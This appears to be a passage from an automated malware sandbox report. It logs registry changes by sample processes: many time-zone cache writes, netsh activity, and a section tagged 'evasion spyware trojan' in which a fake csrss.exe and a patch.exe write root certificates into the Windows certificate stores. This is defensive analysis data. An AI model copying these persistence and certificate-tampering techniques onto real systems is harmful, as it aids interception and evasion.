Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
